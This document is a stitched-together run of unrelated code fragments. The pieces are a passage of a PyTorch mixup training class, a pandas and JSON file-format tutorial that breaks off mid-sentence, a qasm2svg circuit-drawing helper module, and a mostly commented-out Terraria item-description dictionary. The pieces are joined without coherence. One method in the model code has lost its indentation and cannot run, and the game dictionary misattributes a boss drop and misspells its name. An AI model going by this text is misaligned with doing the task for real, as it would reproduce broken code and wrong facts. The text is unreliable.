        self.feat_layer = Canny(non_max_suppression=True, edge_smooth=True)
    elif self.mim_target == 'laplacian':
        self.feat_layer = Laplacian(mode='DoG', use_threshold=False)
    elif self.mim_target == 'sobel':
        self.feat_layer = Sobel(isotropic=True, use_threshold=False, out_channels=2)
    # mixup args: one (mode, alpha) pair per configured mixup variant
    self.mix_mode = mix_mode if isinstance(mix_mode, list) else [str(mix_mode)]
    for _mode in self.mix_mode:
        assert _mode in [
            "vanilla", "mixup", "manifoldmix",
            "cutmix", "fmix", "saliencymix", "smoothmix", "resizemix",
            "attentivemix", "puzzlemix", ]
        if _mode == "manifoldmix":
            assert 0 <= min(mix_args[_mode]["layer"]) and max(mix_args[_mode]["layer"]) < 4
        if _mode == "resizemix":
            assert 0 <= min(mix_args[_mode]["scope"]) and max(mix_args[_mode]["scope"]) <= 1
    self.alpha = alpha if isinstance(alpha, list) else [float(alpha)]
    assert len(self.alpha) == len(self.mix_mode) and len(self.mix_mode) < 6
    self.idx_list = [i for i in range(len(self.mix_mode))]
    self.mix_args = mix_args
    # copy mix_prob: it is converted to a cumulative distribution in place
    self.mix_prob = list(mix_prob) if isinstance(mix_prob, list) else None
    if self.mix_prob is not None:
        assert len(self.mix_prob) == len(self.alpha) and abs(sum(self.mix_prob) - 1) <= 1e-10, \
            "mix_prob={}, sum={}, alpha={}".format(self.mix_prob, sum(self.mix_prob), self.alpha)
        for i in range(1, len(self.mix_prob)):
            self.mix_prob[i] = self.mix_prob[i] + self.mix_prob[i-1]
    self.mix_repeat = int(mix_repeat) if int(mix_repeat) > 1 else 1
    if self.mix_repeat > 1:
        print_log("Warning: mix_repeat={} is more than once.".format(self.mix_repeat))
    if len(self.mix_mode) < self.mix_repeat:
        print_log("Warning: the number of mix_mode={} is less than mix_repeat={}.".format(
            self.mix_mode, self.mix_repeat))
    # save plots
    self.save_name = save_name
    self.save = False
    self.ploter = PlotTensor(apply_inv=True)
    # loss weights: scalar entries are clamped to non-negative floats
    self.loss_weights = loss_weights
    for key in loss_weights.keys():
        if not isinstance(loss_weights[key], list):
            self.loss_weights[key] = float(loss_weights[key]) \
                if float(loss_weights[key]) > 0 else 0
    self.weight_cls = loss_weights.get("weight_cls", 1.)
    self.weight_mim = loss_weights.get("weight_mim", 1.)
    self.cos_annealing = 1.  # decent from 1 to 0 as cosine
    self.init_weights(pretrained=pretrained, pretrained_k=pretrained_k)
def init_weights(self, pretrained=None, pretrained_k=None):
    """Initialize the weights of model.

    Args:
        pretrained (str, optional): Path to pre-trained weights. Default: None.
        pretrained_k (str, optional): Path to pre-trained weights for encoder_k.
            Default: None.
    """
    # init pre-trained params for the frozen key backbone (if any)
    if pretrained_k is not None:
        print_log('load pre-training from: {}'.format(pretrained_k), logger='root')
        if self.backbone_k is not None:
            self.backbone_k.init_weights(pretrained=pretrained_k)
    # init trainable params (backbone + both necks + both heads)
    if pretrained is not None:
        print_log('load model from: {}'.format(pretrained), logger='root')
    self.backbone.init_weights(pretrained=pretrained)
    self.neck_cls.init_weights()
    self.neck_mim.init_weights()
    self.head_cls.init_weights()
    self.head_mim.init_weights()
    # when backbone_k has no own pretrain, clone the query weights into it
    if self.backbone_k is not None and pretrained_k is None:
        for param_q, param_k in zip(self.backbone.parameters(),
                                    self.backbone_k.parameters()):
            param_k.data.copy_(param_q.data)
@torch.no_grad()
def _update_loss_weights(self):
""" update loss weights according to the cos_annealing scalar """
# cos annealing decent, from 1 to 0
for attr in self.loss_weights["decent_weight"]:
setattr(self, attr, self.loss_weights[attr] * self.cos_annealing)
# cos annealing accent, from 0 to 1
for attr in self.loss_weights["accent_weight"]:
setattr(self, attr, self.loss_weights[attr] * (1-self.cos_annealing))
@torch.no_grad()
def _momentum_update(self):
    """Momentum (EMA) update of backbone_k from the trainable backbone."""
    # no q->k update at all when the momentum coefficient is negative
    if self.momentum_k < 0:
        return
    for param_q, param_k in zip(self.backbone.parameters(),
                                self.backbone_k.parameters()):
        if self.momentum_k >= 1:
            # momentum >= 1 degenerates to a straight copy of q into k
            param_k.data.copy_(param_q.data)
        else:
            # standard EMA: k = m * k + (1 - m) * q
            param_k.data = param_k.data * self.momentum_k + \
                param_q.data * (1. - self.momentum_k)
def _features(self, img, gt_label=None, cur_mode="puzzlemix", **kwargs):
    """ generating feature maps or gradient maps
    NOTE(review): only "attentivemix" and "puzzlemix" are handled; for any
    other cur_mode the return below raises UnboundLocalError.  The sole
    caller (forward_mix) only passes these two modes.
    """
    if cur_mode == "attentivemix":
        # resize to the feature extractor's input size, then take the
        # last-stage feature map of the frozen key backbone
        img = F.interpolate(img,
            scale_factor=kwargs.get("feat_size", 224) / img.size(2), mode="bilinear")
        features = self.backbone_k(img)[-1]
    elif cur_mode == "puzzlemix":
        # saliency = per-pixel gradient magnitude of the cls loss w.r.t. input
        input_var = Variable(img, requires_grad=True)
        self.backbone.eval()
        self.head_cls.eval()
        pred = self.neck_cls([self.backbone(input_var)[-1]])
        pred = self.head_cls(pred)
        loss = self.head_cls.loss(pred, gt_label)["loss"]
        loss.backward(retain_graph=False)
        features = torch.sqrt(torch.mean(input_var.grad**2, dim=1))  # grads
        # clear grads in models
        self.backbone.zero_grad()
        self.head_cls.zero_grad()
        # return to train
        self.backbone.train()
        self.head_cls.train()
    return features
@torch.no_grad()
def _manifoldmix(self, img, gt_label, alpha, cur_mode="manifoldmix"):
    """ pixel-wise manifoldmix for the latent space mixup backbone

    Returns (rand_index, _layer, _mask, gt_label) where gt_label becomes
    the (y_a, y_b, lam) mixup triple.  NOTE: uses .cuda() directly, so a
    CUDA device is required.
    """
    # manifoldmix: sample the mixing ratio from Beta(alpha, alpha)
    lam = np.random.beta(alpha, alpha)
    bs = img.size(0)
    rand_index = torch.randperm(bs).cuda()
    # mixup labels
    y_a = gt_label
    y_b = gt_label[rand_index]
    gt_label = (y_a, y_b, lam)
    # pick a random backbone stage within the configured layer range
    _layer = np.random.randint(
        self.mix_args[cur_mode]["layer"][0], self.mix_args[cur_mode]["layer"][1], dtype=int)
    # generate mixup mask at the chosen stage's spatial resolution
    _mask = None
    if img.size(3) > 64:  # normal version of resnet
        scale_factor = 2**(1 + _layer) if _layer > 0 else 1
    else:  # CIFAR version
        scale_factor = 2**(_layer - 1) if _layer > 1 else 1
    _mask_size = img.size(3) // scale_factor
    _mask = torch.zeros(img.size(0), 1, _mask_size, _mask_size).cuda()
    # constant mask: every pixel mixes with the same ratio lam
    _mask[:] = lam
    return rand_index, _layer, _mask, gt_label
def forward_mix(self, img, gt_label, mask=None, remove_idx=-1):
    """computate mini-batch mixup.

    Args:
        img (Tensor): Input images of shape (N, C, H, W).
            Typically these should be mean centered and std scaled.
        gt_label (Tensor): Ground-truth labels.
        mask (tensor): MIM mask.
        remove_idx (int): Remove this idx this time.

    Returns:
        dict[str, Tensor]: A dictionary of loss components.
    """
    # choose a mixup method: uniformly when mix_prob is unset, otherwise
    # by sampling from the (cumulative) mix_prob distribution
    if self.mix_prob is None:
        candidate_list = self.idx_list.copy()
        if 0 <= remove_idx <= len(self.idx_list):
            candidate_list.remove(int(remove_idx))
        cur_idx = random.choices(candidate_list, k=1)[0]
    else:
        rand_n = random.random()
        for i in range(len(self.idx_list)):
            # mix_prob holds cumulative sums, so the first entry above
            # rand_n selects the mode
            if self.mix_prob[i] > rand_n:
                cur_idx = self.idx_list[i]
                if cur_idx == remove_idx:  # randomly choose one among the rest
                    candidate_list = self.idx_list.copy()
                    candidate_list.remove(int(remove_idx))
                    cur_idx = random.choices(candidate_list, k=1)[0]
                break
    outputs = dict(cur_idx=cur_idx)
    cur_mode, cur_alpha = self.mix_mode[cur_idx], self.alpha[cur_idx]
    # applying dynamic methods (need features / saliency to build the mix)
    if cur_mode in ["attentivemix", "automix", "puzzlemix", "samix",]:
        if cur_mode in ["attentivemix", "puzzlemix"]:
            features = self._features(
                img, gt_label=gt_label, cur_mode=cur_mode, **self.mix_args[cur_mode])
            mix_args = dict(alpha=cur_alpha, dist_mode=False,
                features=features, **self.mix_args[cur_mode])
            # eval() dispatches to the mixup function imported under the
            # same name (e.g. puzzlemix) from ..utils
            img, gt_label = eval(cur_mode)(img, gt_label, **mix_args)
        feat = self.backbone(img, mask)
    # hand-crafted methods (mix purely in input space)
    elif cur_mode not in ["manifoldmix",]:
        if cur_mode in ["mixup", "cutmix", "saliencymix", "smoothmix",]:
            img, gt_label = eval(cur_mode)(img, gt_label, cur_alpha, dist_mode=False)
        elif cur_mode in ["resizemix", "fmix"]:
            mix_args = dict(alpha=cur_alpha, dist_mode=False, **self.mix_args[cur_mode])
            img, gt_label = eval(cur_mode)(img, gt_label, **mix_args)
        else:
            assert cur_mode == "vanilla"
        feat = self.backbone(img, mask)
    else:
        # manifoldmix: mixing happens inside the backbone at a random stage
        rand_index, _layer, _mask, gt_label = self._manifoldmix(img, gt_label, cur_alpha)
        # args for mixup backbone
        mix_args = dict(
            layer=_layer, cross_view=False, mask=_mask, BN_shuffle=False, idx_shuffle_BN=None,
            idx_shuffle_mix=rand_index, dist_shuffle=False)
        # TODO: Not support ManifoldMix now
        feat = self.backbone(img, mix_args)
    outputs['feat'] = feat
    # save mixed img
    if self.save and cur_mode != "vanilla":
        # gt_label is (y_a, y_b, lam) after mixing; lam labels the plot
        plot_lam = gt_label[2] if len(gt_label) == 3 else None
        self.plot_mix(img_mixed=img, mix_mode=cur_mode, lam=plot_lam)
    # mixup loss on the last-stage feature, scaled by cls weight / repeats
    outs = self.neck_cls([feat[-1]], mask)
    outs = self.head_cls(outs)
    losses = self.head_cls.loss(outs, gt_label)
    losses['loss'] *= (self.weight_cls / self.mix_repeat)
    return losses, outputs
def forward_train(self, img, gt_label, **kwargs):
"""Forward computation during | |
# Data Engineering Process
# There are several steps in the Data Engineering process.
# Extract :- Data extraction is getting data from multiple sources, e.g. extracting data from a website using web scraping, or gathering information from data stored in different formats (JSON, CSV, XLSX etc.).
# Transform :- Transforming the data means removing the data that we don't need for further analysis and converting the data to a format such that all the data from the multiple sources is in the same format.
# Load :- Loading the data inside a data warehouse. A data warehouse essentially contains large volumes of data that are accessed to gather insights.
# Working with different file formats
# In the real world, people rarely get neat tabular data. Thus, it is mandatory
# for any data scientist (or data engineer) to be aware of different file
# formats, common challenges in handling them and the best / most efficient ways
# to handle this data in real life. We have reviewed some of this content
# in other modules.
# File Format
# A file format is a standard way in which information is encoded for
# storage in a file. First, the file format specifies whether the file is a
# binary or ASCII file. Second, it shows how the information is organized.
# For example, the comma-separated values (CSV) file format stores tabular data
# in plain text.
# To identify a file format, you can usually look at the file extension to
# get an idea. For example, a file saved with the name "Data" in "CSV" format
# will appear as "Data.csv". By noticing the ".csv" extension we can clearly
# identify that it is a "CSV" file and that the data is stored in a tabular format.
# There are various formats for a dataset: .csv, .json, .xlsx etc. The
# dataset can be stored in different places, on your local machine or
# sometimes online.
# In this section, you will learn how to load a dataset into our Jupyter
# Notebook.
# Now, we will look at some file formats and how to read them in Python:
# Comma-separated values (CSV) file format
# The comma-separated values file format falls under the spreadsheet file format.
# In a spreadsheet file format, data is stored in cells. Each cell is
# organized in rows and columns. A column in the spreadsheet file can have
# a different type. For example, a column can be of string type, a date type
# or an integer type.
# Each line in a CSV file represents an observation, commonly called a
# record. Each record may contain one or more fields which are separated by
# a comma.
# Reading the data from CSV in Python
# The Pandas library is a useful tool that enables us to read various
# datasets into a data frame.
# Let us look at how to read a CSV file with the Pandas library.
# We use the pandas.read_csv() function to read the csv file. In the brackets,
# we put the file path along with a quotation mark, so that pandas will
# read the file into a data frame from that address. The file path can be
# either a URL or your local file address.
import pandas as pd
url ='https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-PY0101EN-SkillsNetwork/labs/Module%205/data/addresses.csv'
df = pd.read_csv(url)
df
# Naming the columns of the DataFrame
# We can (re)name the columns of an existing DataFrame by assigning to its
# columns attribute.
df.columns =['First Name', 'Last Name', 'Location ', 'City','State','Area Code']
df
# Selecting a single column
# To select the first column 'First Name', you can pass the column name as
# a string to the indexing operator.
df["First Name"]
# Selecting multiple columns
# To select multiple columns, you can pass a list of column names to the
# indexing operator.
df = df[['First Name', 'Last Name', 'Location ', 'City','State','Area Code']]
df
# Selecting rows using .iloc and .loc
# Now, let's see how to use .loc for selecting rows from our DataFrame.
# loc(): loc() is a label-based data selecting method, which means that we
# have to pass the name of the row or column which we want to select.
# To select the first row
df.loc[0]
# To select the 0th, 1st and 2nd rows of the "First Name" column only
df.loc[[0,1,2], "First Name" ]
# Now, let's see how to use .iloc for selecting rows from our DataFrame.
# iloc(): iloc() is an index-based selecting method, which means that we
# have to pass an integer index to the method to select a specific row/column.
# To select the 0th, 1st and 2nd rows of the "First Name" column only
df.iloc[[0,1,2], 0]
# Transform Function in Pandas
# Pandas' transform function returns a DataFrame with transformed values
# after applying the function specified in its parameter.
# Let's see how the transform function works.
# import libraries
import pandas as pd
import numpy as np
# creating a dataframe
df=pd.DataFrame(np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]), columns=['a', 'b', 'c'])
df
# Let's say we want to add 10 to each element in the dataframe:
# applying the transform function
df = df.transform(func = lambda x : x + 10)
df
# Now we will use the DataFrame.transform() function to apply the square
# root to each element of the dataframe ('sqrt' names the NumPy ufunc).
result = df.transform(func = ['sqrt'])
result
# JSON file Format
# JSON (JavaScript Object Notation) is a lightweight data-interchange format.
# It is easy for humans to read and write.
#
# JSON is built on two structures:
# A collection of name/value pairs. In various languages, this is realized as an object, record, struct, dictionary, hash table, keyed list, or associative array.
# An ordered list of values. In most languages, this is realized as an array, vector, list, or sequence.
# JSON is a language-independent data format. It was derived from
# JavaScript, but many modern programming languages include code to
# generate and parse JSON-format data. It is a very common data format,
# with a diverse range of applications.
# The text in JSON is a quoted string which contains the values in
# key-value mappings within { }. It is similar to a dictionary in
# Python.
# Python supports JSON through a built-in package called json. To use this
# feature, we import the json package in a Python script.
import json
# Writing JSON to a File
# This is usually called serialization. It is the process of converting an
# object into a special format which is suitable for transmitting over the
# network or storing in a file or database.
# To handle the data flow to a file, the JSON library in Python uses the
# dump() or dumps() function to convert Python objects into their
# respective JSON objects, making it easy to write data to files.
import json
person = {
    'first_name' : 'Mark',
    'last_name' : 'abc',
    'age' : 27,
    'address': {
        "streetAddress": "21 2nd Street",
        "city": "New York",
        "state": "NY",
        "postalCode": "10021-3100"
    }
}
# serialization using the dump() function
# The json.dump() method can be used for writing to a JSON file.
# Syntax: json.dump(dict, file_pointer)
# Parameters:
# dictionary - the name of the dictionary which should be converted to a JSON object.
# file pointer - pointer of the file opened in write or append mode.
with open('person.json', 'w') as f: # writing JSON object
    json.dump(person, f)
# serialization using the dumps() function
# json.dumps() helps in converting a dictionary to a JSON object.
# It takes two parameters:
# dictionary - the name of the dictionary which should be converted to a JSON object.
# indent - defines the number of units for indentation
# Serializing json
json_object = json.dumps(person, indent = 4)
# Writing to sample.json
with open("sample.json", "w") as outfile:
    outfile.write(json_object)
print(json_object)
# Our Python objects are now serialized to the file. To deserialize them
# back to Python objects we use the load() function.
# Reading JSON from a File
# This process is usually called deserialization: it is the reverse of
# serialization. It converts the special format returned by
# serialization back into a usable object.
# Using json.load()
# The JSON package has json.load() function that loads the json content from a json file into a | |
<gh_stars>1-10
# ======================================================================
# Copyright CERFACS (February 2018)
# Contributor: <NAME> (<EMAIL>)
#
# This software is governed by the CeCILL-B license under French law and
# abiding by the rules of distribution of free software. You can use,
# modify and/or redistribute the software under the terms of the
# CeCILL-B license as circulated by CEA, CNRS and INRIA at the following
# URL "http://www.cecill.info".
#
# As a counterpart to the access to the source code and rights to copy,
# modify and redistribute granted by the license, users are provided
# only with a limited warranty and the software's author, the holder of
# the economic rights, and the successive licensors have only limited
# liability.
#
# In this respect, the user's attention is drawn to the risks associated
# with loading, using, modifying and/or developing or reproducing the
# software by the user in light of its specific status of free software,
# that may mean that it is complicated to manipulate, and that also
# therefore means that it is reserved for developers and experienced
# professionals having in-depth computer knowledge. Users are therefore
# encouraged to load and test the software's suitability as regards
# their requirements in conditions enabling the security of their
# systems and/or data to be ensured and, more generally, to use and
# operate it in the same conditions as regards security.
#
# The fact that you are presently reading this means that you have had
# knowledge of the CeCILL-B license and that you accept its terms.
# ======================================================================
"""This module groups useful functions for qasm2svg.
The functions here are used in many places in the code of qasm2svg
and needed to be in a separate module.
"""
import os
from typing import Tuple, Sequence, Union
from qasm2image.svg import _constants, _types
QubitType = Tuple[str, int]
def get_x_from_index(index: int) -> int:
    """Return the x-coordinate of the centre of the given column.

    The circuit drawing is divided into equally sized columns, each one
    holding a gate plus some horizontal spacing. This translates a column
    index into the x-coordinate (expressed in the same unit as the values
    defined in _constants.py) of that column's centre.

    Parameters:
        index (int): Zero-based index of the column in which we want to
            plot. The circuit representation is divided in columns; in
            each column fits a gate and some additional space for gate
            separation.

    Returns:
        int: The *center* of the column that corresponds to the given
            index (not its left border).
            NOTE(review): the `/ 2` below yields a float in Python 3, so
            the annotated `int` return type only holds for even
            GATE_SIZE — confirm.
    """
    column_width = _constants.GATE_SIZE + _constants.GATE_HORIZONTAL_SPACING
    return (_constants.REGISTER_NAME_WIDTH
            + _constants.GATE_LEFT_BORDER
            + index * column_width
            + _constants.GATE_SIZE / 2)
def get_y_from_quantum_register(qreg_index_in_json: int,
                                bit_mapping: dict) -> int:
    """Return the y-coordinate of the line drawn for a quantum register.

    This method assumes that all the quantum registers are drawn *before*
    (i.e. above) the classical ones.

    Parameters:
        qreg_index_in_json (int): identifier of the quantum register in
            the JSON circuit representation.
        bit_mapping (dict): correspondence between bit indices in the
            JSON circuit and the desired output indices.
            Structure:
                {'qubits': {index_in_JSON: index_in_drawing},
                 'clbits': {index_in_JSON: index_in_drawing}}

    Returns:
        int: The y-coordinate of the line representing the requested
            quantum register.
    """
    drawing_index = bit_mapping['qubits'][qreg_index_in_json]
    return (_constants.VERTICAL_BORDER
            + drawing_index * _constants.REGISTER_LINES_VERTICAL_SPACING)
def get_y_from_classical_register(clreg_index_in_json: int,
                                  quantum_registers_number: int,
                                  bit_mapping: dict) -> int:
    """Return the y-coordinate of the line drawn for a classical register.

    This method assumes that all the quantum registers are drawn *before*
    (i.e. above) the classical ones, so the drawing index of a classical
    bit is offset by the number of quantum registers.

    Parameters:
        clreg_index_in_json (int): identifier of the classical register
            in the JSON circuit representation.
        quantum_registers_number (int): number of quantum registers in
            the circuit.
        bit_mapping (dict): correspondence between bit indices in the
            JSON circuit and the desired output indices.
            Structure:
                {'qubits': {index_in_JSON: index_in_drawing},
                 'clbits': {index_in_JSON: index_in_drawing}}

    Returns:
        int: The y-coordinate of the line representing the requested
            classical register.
    """
    drawing_index = (quantum_registers_number
                     + bit_mapping['clbits'][clreg_index_in_json])
    return (_constants.VERTICAL_BORDER
            + drawing_index * _constants.REGISTER_LINES_VERTICAL_SPACING)
def get_dimensions(json_circuit, show_clbits: bool) -> Tuple[int, int]:
    """Compute the width and height of the drawing of the given circuit.

    Parameters:
        json_circuit (dict): JSON representation of the circuit. Can be
            obtained from the QASM representation with:
                # qasm_str is the string containing the QASM code.
                ast = qiskit.qasm.Qasm(data = qasm_str).parse()
                u = qiskit.unroll.Unroller(ast, qiskit.unroll.JsonBackend(basis))
                u.execute()
                json_circuit = u.backend.circuit
        show_clbits (bool): True if the classical bits should also be
            drawn (they then contribute to the height).

    Returns:
        tuple: The computed (width, height) of the given circuit.
    """
    column_count = _get_circuit_width(json_circuit)
    header = json_circuit['header']
    line_count = header.get('number_of_qubits', 0)
    if show_clbits:
        line_count += header.get('number_of_clbits', 0)
    column_width = _constants.GATE_SIZE + _constants.GATE_HORIZONTAL_SPACING
    # The trailing spacing of the last column is not drawn, hence the
    # subtraction of one GATE_HORIZONTAL_SPACING.
    width = (_constants.REGISTER_NAME_WIDTH
             + _constants.GATE_LEFT_BORDER
             + column_count * column_width
             - _constants.GATE_HORIZONTAL_SPACING
             + _constants.GATE_RIGHT_BORDER)
    height = (_constants.VERTICAL_BORDER
              + (line_count - 1) * _constants.REGISTER_LINES_VERTICAL_SPACING
              + _constants.VERTICAL_BORDER)
    return width, height
def _get_circuit_width(json_circuit) -> int:
    """Return the number of drawing columns needed for the given circuit.

    The returned width is not:
        1) A number of pixels (or cm, mm, ...).
        2) The *minimum* number of time steps needed to complete the
           circuit.
    Here the "width" is the number of columns needed to *represent
    clearly* the circuit. Two instructions that are completely
    independent (e.g. `cx q[0], q[5];` and `cx q[1], q[6];`) could run in
    one time step, but their graphical representations overlap between
    qubits 1 and 5, so they still occupy two columns and this function
    returns 2 even though the quantum-computing width is 1.

    Parameters:
        json_circuit (dict): JSON representation of the circuit. Can be
            obtained from the QASM representation with:
                # qasm_str is the string containing the QASM code.
                ast = qiskit.qasm.Qasm(data = qasm_str).parse()
                u = qiskit.unroll.Unroller(ast, qiskit.unroll.JsonBackend(basis))
                u.execute()
                json_circuit = u.backend.circuit

    Returns:
        int: The computed width (in columns) of the given circuit.
    """
    header = json_circuit['header']
    # max(..., 1) keeps each list non-empty so the max() calls at the end
    # are always well-defined, even when one bit kind is absent.
    last_gate_column = {
        'clbits': [0] * max(header.get('number_of_clbits', 0), 1),
        'qubits': [0] * max(header.get('number_of_qubits', 0), 1)}
    # Advance the per-bit column counters instruction by instruction.
    for instruction in json_circuit['instructions']:
        _update_data_structure(last_gate_column, instruction)
    return max(max(last_gate_column['clbits']),
               max(last_gate_column['qubits']))
def get_max_index(bit_gate_rank: _types.BitRankType, instruction=None,
qubits=None, clbits=None) -> \
Tuple[int, Tuple[int, int, int, int]]:
"""Compute the maximum x index with an overlap.
The maximum x index with an overlap is the maximum column index
where the representation of the 'instruction' (see below) would
overlap with an already drawn gate representation.
The algorithm to determine the 'instruction' is:
1) If the instruction parameter is not None, then data is extracted
from it.
2) If the instruction parameter is None and at least one of the qubits
and clbits parameters is set, then data is extracted from the
qubits and clbits parameters.
3) Else, an exception is raised.
Parameters:
bit_gate_rank (dict): Dictionnary representing the column index
of the last drawn gate for each bit.
Structure: {'qubits' : [ 3, # last drawn gate on the first qubit
# is in the third column.
2,
...,
10 ], # last drawn gate on the last qubit
# is in the tenth column.
'clbits' : [ 1, # last drawn gate on the first
classical
# bit is on the first column.
...,
0 ]
}
instruction (dict): Dictionnary representing the current instruction.
Structure: see qiskit data structures.
qubits (list): A list of quantum bits.
clbits (list): A list of classical bits.
Returns:
tuple: (max_index, (minq, maxq, minc, maxc)):
- max_index (int): the maximum x index with an overlap.
- minq (int): smallest qubit index used.
- maxq (int): greatest qubit index used.
- minc (int): smallest classical bit index used.
- maxc (int): greatest classical bit index used.
You can iterate on all the register indexes where something will
be drawn with
for qreg_index in range(minq, maxq+1):
# code
for creg_index in range(minq, maxq+1):
# code
The ranges can be empty, i.e. it is possible that minq = 0 and
maxq = -1 or minc = 0 and maxc = -1.
Raises:
RuntimeError: when no instruction, no qubits and no clbits are given | |
# "Skeleton Statue": "",
# "Reaper Statue": "",
# "Woman Statue": "",
# "Imp Statue": "",
# "Gargoyle Statue": "",
# "Gloom Statue": "",
# "Hornet Statue": "",
# "Bomb Statue": "",
# "Crab Statue": "",
# "Hammer Statue": "",
# "Potion Statue": "",
# "Spear Statue": "",
# "Cross Statue": "",
# "Jellyfish Statue": "",
# "Bow Statue": "",
# "Boomerang Statue": "",
# "Boot Statue": "",
# "Chest Statue": "",
# "Bird Statue": "",
# "Axe Statue": "",
# "Corrupt Statue": "",
# "Tree Statue": "",
# "Anvil Statue": "",
# "Pickaxe Statue": "",
# "Mushroom Statue": "",
# "Eyeball Statue": "",
# "Pillar Statue": "",
# "Heart Statue": "",
# "Pot Statue": "",
# "Sunflower Statue": "",
# "King Statue": "",
# "Queen Statue": "",
# "Piranha Statue": "",
# "Planked Wall": "",
# "Wooden Beam": "",
# "Adamantite Repeater": "",
# "Adamantite Sword": "",
# "Cobalt Sword": "",
# "Mythril Sword": "",
# "Moon Charm": "",
# "Ruler": "",
# "Crystal Ball": "",
# "Disco Ball": "",
# "Sorcerer Emblem": "",
# "Warrior Emblem": "",
# "Ranger Emblem": "",
# "Demon Wings": "",
# "Angel Wings": "",
# "Magical Harp": "",
# "Rainbow Rod": "",
# "Ice Rod": "",
# "Neptune's Shell": "",
# "Mannequin": "",
# "Greater Healing Potion": "",
# "Greater Mana Potion": "",
# "Pixie Dust": "",
# "Crystal Shard": "",
# "Clown Hat": "",
# "Clown Shirt": "",
# "Clown Pants": "",
# "Flamethrower": "",
# "Bell": "",
# "Harp": "",
# "Red Wrench": "",
# "Wire Cutter": "",
# "Active Stone Block": "",
# "Inactive Stone Block": "",
# "Lever": "",
# "Laser Rifle": "",
# "Crystal Bullet": "",
"Holy Arrow": "made with 200 wooden arrow, 3 pixie dust and 1 unicorn horn",
# "Magic Dagger": "",
# "Crystal Storm": "",
# "Cursed Flames": "",
# "Soul of Light": "",
# "Soul of Night": "",
# "Cursed Flame": "",
"Cursed Torch": "cursed torches are made with 33 torches and 1 cursed flame",
# "Adamantite Forge": "",
# "Mythril Anvil": "",
# "Unicorn Horn": "",
# "Dark Shard": "",
# "Light Shard": "",
# "Red Pressure Plate": "",
# "Wire": "",
# "Spell Tome": "",
# "Star Cloak": "",
# "Megashark": "",
# "Shotgun": "",
# "Philosopher's Stone": "",
# "Titan Glove": "",
# "Cobalt Naginata": "",
# "Switch": "",
# "Dart Trap": "",
# "Boulder": "",
# "Green Pressure Plate": "",
# "Gray Pressure Plate": "",
# "Brown Pressure Plate": "",
# "Mechanical Eye": "",
"Cursed Arrow": "made with 150 wooden arrow and 1 cursed flame",
"Cursed Bullet": "",
"Soul of Fright": "soul of fright is dropped by defeating skeletron prime",
"Soul of Might": "soul of might is dropped by defeating destoryer of worlds",
"Soul of Sight": "soul of sight is dropped by defeating the twins",
# "Gungnir": "",
# "Hallowed Plate Mail": "",
# "Hallowed Greaves": "",
# "Hallowed Helmet": "",
# "Cross Necklace": "",
# "Mana Flower": "",
# "Mechanical Worm": "",
# "Mechanical Skull": "",
# "Hallowed Headgear": "",
# "Hallowed Mask": "",
# "Slime Crown": "",
# "Light Disc": "",
# "Music Box (Overworld Day)": "",
# "Music Box (Eerie)": "",
# "Music Box (Night)": "",
# "Music Box (Title)": "",
# "Music Box (Underground)": "",
# "Music Box (Boss 1)": "",
# "Music Box (Jungle)": "",
# "Music Box (Corruption)": "",
# "Music Box (Underground Corruption)": "",
# "Music Box (The Hallow)": "",
# "Music Box (Boss 2)": "",
# "Music Box (Underground Hallow)": "",
# "Music Box (Boss 3)": "",
# "Soul of Flight": "",
# "Music Box": "",
# "Demonite Brick": "",
# "Hallowed Repeater": "",
# "Drax": "",
# "Explosives": "",
# "Inlet Pump": "",
# "Outlet Pump": "",
# "1 Second Timer": "",
# "3 Second Timer": "",
# "5 Second Timer": "",
# "Candy Cane Block": "",
# "Candy Cane Wall": "",
# "Santa Hat": "",
# "Santa Shirt": "",
# "Santa Pants": "",
# "Green Candy Cane Block": "",
# "Green Candy Cane Wall": "",
# "Snow Block": "",
# "Snow Brick": "",
# "Snow Brick Wall": "",
# "Blue Light": "",
# "Red Light": "",
# "Green Light": "",
# "Blue Present": "",
# "Green Present": "",
# "Yellow Present": "",
# "Snow Globe": "",
# "Carrot": "",
# "Adamantite Beam": "",
# "Adamantite Beam Wall": "",
# "Demonite Brick Wall": "",
# "Sandstone Brick": "",
# "Sandstone Brick Wall": "",
# "Ebonstone Brick": "",
# "Ebonstone Brick Wall": "",
# "Red Stucco": "",
# "Yellow Stucco": "",
# "Green Stucco": "",
# "Gray Stucco": "",
# "Red Stucco Wall": "",
# "Yellow Stucco Wall": "",
# "Green Stucco Wall": "",
# "Gray Stucco Wall": "",
# "Ebonwood": "",
# "<NAME>any": "",
# "Pearlwood": "",
# "Ebonwood Wall": "",
# "Rich Mahogany Wall": "",
# "Pearlwood Wall": "",
# "Ebonwood Chest": "",
# "Rich Mahogany Chest": "",
# "Pearlwood Chest": "",
# "Ebonwood Chair": "",
# "Rich Mahogany Chair": "",
# "Pearlwood Chair": "",
# "Ebonwood Platform": "",
# "Rich Mahogany Platform": "",
# "Pearlwood Platform": "",
# "Bone Platform": "",
# "Ebonwood Work Bench": "",
# "Rich Mahogany Work Bench": "",
# "Pearlwood Work Bench": "",
# "Ebonwood Table": "",
# "Rich Mahogany Table": "",
# "Pearlwood Table": "",
# "Ebonwood Piano": "",
# "<NAME> Piano": "",
# "Pearlwood Piano": "",
# "Ebonwood Bed": "",
# "Rich Mahogany Bed": "",
# "Pearlwood Bed": "",
# "Ebonwood Dresser": "",
# "Rich Mahogany Dresser": "",
# "Pearlwood Dresser": "",
# "Ebonwood Door": "",
# "Rich Mahogany Door": "",
# "Pearlwood Door": "",
# "Ebonwood Sword": "",
# "Ebonwood Hammer": "",
# "Ebonwood Bow": "",
# "Rich Mahogany Sword": "",
# "Rich Mahogany Hammer": "",
# "Rich Mahogany Bow": "",
# "Pearlwood Sword": "",
# "Pearlwood Hammer": "",
# "Pearlwood Bow": "",
# "Rainbow Brick": "",
# "Rainbow Brick Wall": "",
# "Ice Block": "",
# "Red's Wings": "",
# "Red's Helmet": "",
# "Red's Breastplate": "",
# "Red's Leggings": "",
# "Fish": "",
# "Ice Boomerang": "",
# "Keybrand": "",
# "Cutlass": "",
# "Boreal Wood Work Bench": "",
# "True Excalibur": "",
# "True Night's Edge": "",
# "Frostbrand": "",
# "Boreal Wood Table": "",
# "Red Potion": "",
# "Tactical Shotgun": "",
# "Ivy Chest": "",
# "Ice Chest": "",
# "Marrow": "",
# "Unholy Trident": "",
# "Frost Helmet": "",
# "Frost Breastplate": "",
# "Frost Leggings": "",
# "Tin Helmet": "",
# "Tin Chainmail": "",
# "Tin Greaves": "",
# "Lead Helmet": "",
